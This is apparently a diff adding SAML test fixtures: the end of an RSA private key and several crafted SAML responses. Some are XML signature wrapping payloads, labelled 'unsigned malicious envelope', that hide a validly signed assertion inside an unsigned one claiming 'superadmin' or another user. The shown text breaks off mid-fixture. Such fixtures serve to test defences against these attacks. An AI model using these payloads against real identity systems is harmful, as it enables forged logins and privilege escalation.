|
+
f1dr7ByJgTzbawdUfI5we6YTeu2Titaynj0ujAzZV/UH0A71AkEA/gM+nEQoKu8M
|
|
8
|
+
y2JgKfqjEfanMwFxvgdtz0xu1sLbpLh8ipQ1SvYpcsTIDTViOMT45uKE5Ov6zwla
|
|
9
|
+
H2N5dJdhkwJBAM7wpuk3XX7+nHzYko2w5xm9C6858bqXhl37xJyyqeT5SCSa7+T0
|
|
10
|
+
U91nZuumk3ZaTRdW5BCbcshX+Gyk/ZrOIhMCQBAxgMJRjgX+q2Aj62GBuvegM9SK
|
|
11
|
+
mQe2TYfTpZVHYt1DbZ0gCa23t7i7Vs2Qw6w+0mdVtYcqjBi6zeYGX23RYMUCQCmf
|
|
12
|
+
ohL6veWTVOqPrTquwG0e50DBiOudGrvArlVOYnnZ4jbqqyIEOvInoD357WM62pK9
|
|
13
|
+
OXZVrgq6Fw/TR+dhWt0CQQCU2Aj4q96Uu8+NVUQ++cpi1hOJrlYzjMSu0BbEBGjb
|
|
14
|
+
S1jxgEPxkHc8xZU2X3lr6FgjmlyLje3UaYRh870M1o3x
|
|
15
|
+
-----END RSA PRIVATE KEY-----
|
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" ID="Rca160a86480551b76b463ee206bd8deeb47a11f8" IssueInstant="2014-02-01T13:48:10.831Z" Version="2.0"><saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">https://app.onelogin.com/saml/metadata/344357</saml2:Issuer><saml2p:Status><saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/><saml2p:StatusDetail><saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="pfx77d6c794-8295-f1c4-298e-c25ecae8046d" IssueInstant="2014-02-01T13:48:10.831Z" Version="2.0"><saml2:Issuer>https://app.onelogin.com/saml/metadata/344357</saml2:Issuer><saml2:Subject><saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">evilnds1@gmail.com</saml2:NameID><saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml2:SubjectConfirmationData NotOnOrAfter="2014-02-01T13:51:10.831Z"/></saml2:SubjectConfirmation></saml2:Subject><saml2:Conditions NotBefore="2014-02-01T13:45:10.831Z" NotOnOrAfter="2014-02-01T13:51:10.831Z"><saml2:AudienceRestriction><saml2:Audience/></saml2:AudienceRestriction></saml2:Conditions><saml2:AuthnStatement AuthnInstant="2014-02-01T13:48:10.831Z" SessionIndex="_f918ae80-4092-0131-57de-782bcb56fcaa" SessionNotOnOrAfter="2014-02-01T14:48:10.831Z"><saml2:AuthnContext><saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef></saml2:AuthnContext></saml2:AuthnStatement></saml2:Assertion></saml2p:StatusDetail></saml2p:Status><saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="pfx77d6c794-8295-f1c4-298e-c25ecae8046d" IssueInstant="2014-02-01T13:48:10.831Z" Version="2.0"><saml2:Issuer>https://app.onelogin.com/saml/metadata/344357</saml2:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><ds:Reference URI="#pfx77d6c794-8295-f1c4-298e-c25ecae8046d"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>YgLTtFKmQhg5sI6ri4RCWW4bNl8=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>BWA+UYpDNnJ6kqNFEHEFiAgumplPQxzdjuEKbnZldkNE2tCvQdZ46dil0G0375dRKtRTZKLV3aL/JyhJ7hJ835IldfJ2AhDfpI+jr+KjF06amx1o6lOy0qBo0U/HzCRaG8c/ZS1BUW2eMJrBFg0QvKN5uzwst8epIa3QRaBXt5o=</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICRzCCAbCgAwIBAgIIFH/2Xc6W0VYwDQYJKoZIhvcNAQEFBQAwZjEQMA4GA1UEBhMHVW5rbm93
|
|
2
|
+
bjEQMA4GA1UEBxMHVW5rbm93bjEXMBUGCgmSJomT8ixkARkWB1Vua25vd24xEjAQBgNVBAsTCXBl
|
|
3
|
+
blRlc3RlcjETMBEGA1UEAxMKd3NhdHRhY2tlcjAeFw0xMzA4MTcxMDAwMjZaFw0xNDA4MTcxMDAw
|
|
4
|
+
MjZaMGYxEDAOBgNVBAYTB1Vua25vd24xEDAOBgNVBAcTB1Vua25vd24xFzAVBgoJkiaJk/IsZAEZ
|
|
5
|
+
FgdVbmtub3duMRIwEAYDVQQLEwlwZW5UZXN0ZXIxEzARBgNVBAMTCndzYXR0YWNrZXIwgZ8wDQYJ
|
|
6
|
+
KoZIhvcNAQEBBQADgY0AMIGJAoGBAIvdbrUPV/hHq0if17Ut1UyJHYvkfsKD7WU/QshqEc3Iefti
|
|
7
|
+
2jsOG6hecBGZzwEfk0V2OFIO/xkmnvf21uTnNI6ktVypBEPCRWyAYjUguettLv9gi+6vlP0OZUC9
|
|
8
|
+
b+ilu3QykIADFfgTJ9sR5x3zKVzlhFlckaYZoI+ajG/On961AgMBAAEwDQYJKoZIhvcNAQEFBQAD
|
|
9
|
+
gYEAF2UzN7k3+rc5NE84FqzgeX7T/QY5ZSjiSCzDTg92a41Gmw95fF3UqGfxSBZOwRdm618PhAGV
|
|
10
|
+
6lYq8ok4mbrTA7F/11lyFwmMSjRizjtznQmtVVXPZVfutNv8oaIRr2cyGf9pxCfpCG0jyXvusX22
|
|
11
|
+
q9PkfQW/qHgIaBovmMd2Jak=</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml2:Subject><saml2:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">bob.trust@gmx.de</saml2:NameID><saml2:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml2:SubjectConfirmationData NotOnOrAfter="2014-02-01T13:51:10.831Z"/></saml2:SubjectConfirmation></saml2:Subject><saml2:Conditions NotBefore="2014-02-01T13:45:10.831Z" NotOnOrAfter="2014-02-01T13:51:10.831Z"><saml2:AudienceRestriction><saml2:Audience/></saml2:AudienceRestriction></saml2:Conditions><saml2:AuthnStatement AuthnInstant="2014-02-01T13:48:10.831Z" SessionIndex="_f918ae80-4092-0131-57de-782bcb56fcaa" SessionNotOnOrAfter="2014-02-01T14:48:10.831Z"><saml2:AuthnContext><saml2:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef></saml2:AuthnContext></saml2:AuthnStatement></saml2:Assertion></saml2p:Response>
|
|
@@ -0,0 +1,45 @@
|
|
|
1
|
+
<!-- = = = = = = = = = = = = = = -->
|
|
2
|
+
<!-- unsigned malicious envelope -->
|
|
3
|
+
<!-- = = = = = = = = = = = = = = -->
|
|
4
|
+
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="attackergenerated1" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
|
|
5
|
+
<samlp:Status>
|
|
6
|
+
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
|
|
7
|
+
<samlp:StatusDetail>
|
|
8
|
+
<!-- = = = = = = = = = = = -->
|
|
9
|
+
<!-- valid signed response -->
|
|
10
|
+
<!-- = = = = = = = = = = = -->
|
|
11
|
+
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_32f10e8e465fcef72368e220faeb81db4c72f0c687" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
12
|
+
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
13
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
14
|
+
<ds:Reference URI="#_32f10e8e465fcef72368e220faeb81db4c72f0c687"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>S6Ne11nB7g1OyQAGYrFEOnu5QAQ=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>mgqZUiA3matrj6Zy4Dl+1ghsgoOl8wPH2mrFM9PAqrYB0skuJUZhYUkCegEbEX9WROEhoZ2bgwJQqeUPyX7leMPe7SSdUDNKf9kiuvpcCYZs1lFSEd51Ec8f+HvejmHUJAU+JIRWpp1VkYUZATihwjGLok3NGi/ygoajNh42vZ4=</ds:SignatureValue>
|
|
15
|
+
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_6212b7e8c069d0f948c8648991d357addc4095a82f" Version="2.0" IssueInstant="2012-08-03T20:07:15Z"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
16
|
+
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
17
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
18
|
+
<ds:Reference URI="#_6212b7e8c069d0f948c8648991d357addc4095a82f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>kaZN1+moS328pr2zn8SKUML1ElI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>1kUEkG33ZGQMf/1H1gzqBOhT5N2I35vM04Jp67xVjnZXF54AqPq1ZaM+Wjgx++AjEbL7ksaYuM3JSyK7GlZ77VmzpLsMqn4eM00K7Y+CeZy5LB24vcngXPxBk6BdUYkVk0vOsUfAAZ+mRX/zzBW7Z4C7qbjNGhAAJgi13JoBWpU=</ds:SignatureValue>
|
|
19
|
+
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_3b3e7714b72e29dc4290321a075fa0b73333a4f25f</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2012-08-03T20:12:15Z" Recipient="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2012-08-03T20:06:45Z" NotOnOrAfter="2012-08-03T20:12:15Z"><saml:AudienceRestriction><saml:Audience>http://shard1.localdomain/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">student@example.edu</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>
|
|
20
|
+
</samlp:StatusDetail>
|
|
21
|
+
</samlp:Status>
|
|
22
|
+
|
|
23
|
+
<saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="attackergenerated2" Version="2.0" IssueInstant="2012-08-03T20:07:15Z">
|
|
24
|
+
<saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
|
|
25
|
+
<saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e">
|
|
26
|
+
<saml:AuthnContext>
|
|
27
|
+
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
|
|
28
|
+
</saml:AuthnContext>
|
|
29
|
+
</saml:AuthnStatement>
|
|
30
|
+
<saml:Subject>
|
|
31
|
+
<saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">superadmin</saml:NameID>
|
|
32
|
+
</saml:Subject>
|
|
33
|
+
<!-- = = = = = = = = = = = = = = = -->
|
|
34
|
+
<!-- last attributes will win -->
|
|
35
|
+
<!-- = = = = = = = = = = = = = = = -->
|
|
36
|
+
<saml:AttributeStatement>
|
|
37
|
+
<saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
|
38
|
+
<saml:AttributeValue xsi:type="xs:string">superadmin</saml:AttributeValue></saml:Attribute>
|
|
39
|
+
<saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
|
40
|
+
<saml:AttributeValue xsi:type="xs:string">superadmin@example.edu</saml:AttributeValue>
|
|
41
|
+
</saml:Attribute>
|
|
42
|
+
</saml:AttributeStatement>
|
|
43
|
+
</saml:Assertion>
|
|
44
|
+
</samlp:Response>
|
|
45
|
+
|
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
<!-- = = = = = = = = = = = = = = -->
|
|
2
|
+
<!-- unsigned malicious envelope -->
|
|
3
|
+
<!-- = = = = = = = = = = = = = = -->
|
|
4
|
+
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="attackergenerated1" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
|
|
5
|
+
<saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="attackergenerated2" Version="2.0" IssueInstant="2012-08-03T20:07:15Z">
|
|
6
|
+
<saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer>
|
|
7
|
+
<saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e">
|
|
8
|
+
<saml:AuthnContext>
|
|
9
|
+
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
|
|
10
|
+
</saml:AuthnContext>
|
|
11
|
+
</saml:AuthnStatement>
|
|
12
|
+
<!-- = = = = = = = = = = = = = = = -->
|
|
13
|
+
<!-- first nameid will win -->
|
|
14
|
+
<!-- = = = = = = = = = = = = = = = -->
|
|
15
|
+
<saml:Subject>
|
|
16
|
+
<saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">superadmin</saml:NameID>
|
|
17
|
+
</saml:Subject>
|
|
18
|
+
<saml:AttributeStatement>
|
|
19
|
+
<saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
|
20
|
+
<saml:AttributeValue xsi:type="xs:string">superadmin</saml:AttributeValue></saml:Attribute>
|
|
21
|
+
<saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
|
22
|
+
<saml:AttributeValue xsi:type="xs:string">superadmin@example.edu</saml:AttributeValue>
|
|
23
|
+
</saml:Attribute>
|
|
24
|
+
</saml:AttributeStatement>
|
|
25
|
+
</saml:Assertion>
|
|
26
|
+
<samlp:Status>
|
|
27
|
+
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
|
|
28
|
+
<samlp:StatusDetail>
|
|
29
|
+
<!-- = = = = = = = = = = = -->
|
|
30
|
+
<!-- valid signed response -->
|
|
31
|
+
<!-- = = = = = = = = = = = -->
|
|
32
|
+
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_32f10e8e465fcef72368e220faeb81db4c72f0c687" Version="2.0" IssueInstant="2012-08-03T20:07:15Z" Destination="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
33
|
+
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
34
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
35
|
+
<ds:Reference URI="#_32f10e8e465fcef72368e220faeb81db4c72f0c687"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>S6Ne11nB7g1OyQAGYrFEOnu5QAQ=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>mgqZUiA3matrj6Zy4Dl+1ghsgoOl8wPH2mrFM9PAqrYB0skuJUZhYUkCegEbEX9WROEhoZ2bgwJQqeUPyX7leMPe7SSdUDNKf9kiuvpcCYZs1lFSEd51Ec8f+HvejmHUJAU+JIRWpp1VkYUZATihwjGLok3NGi/ygoajNh42vZ4=</ds:SignatureValue>
|
|
36
|
+
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_6212b7e8c069d0f948c8648991d357addc4095a82f" Version="2.0" IssueInstant="2012-08-03T20:07:15Z"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
37
|
+
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
38
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
39
|
+
<ds:Reference URI="#_6212b7e8c069d0f948c8648991d357addc4095a82f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>kaZN1+moS328pr2zn8SKUML1ElI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>1kUEkG33ZGQMf/1H1gzqBOhT5N2I35vM04Jp67xVjnZXF54AqPq1ZaM+Wjgx++AjEbL7ksaYuM3JSyK7GlZ77VmzpLsMqn4eM00K7Y+CeZy5LB24vcngXPxBk6BdUYkVk0vOsUfAAZ+mRX/zzBW7Z4C7qbjNGhAAJgi13JoBWpU=</ds:SignatureValue>
|
|
40
|
+
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_3b3e7714b72e29dc4290321a075fa0b73333a4f25f</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2012-08-03T20:12:15Z" Recipient="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2012-08-03T20:06:45Z" NotOnOrAfter="2012-08-03T20:12:15Z"><saml:AudienceRestriction><saml:Audience>http://shard1.localdomain/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" 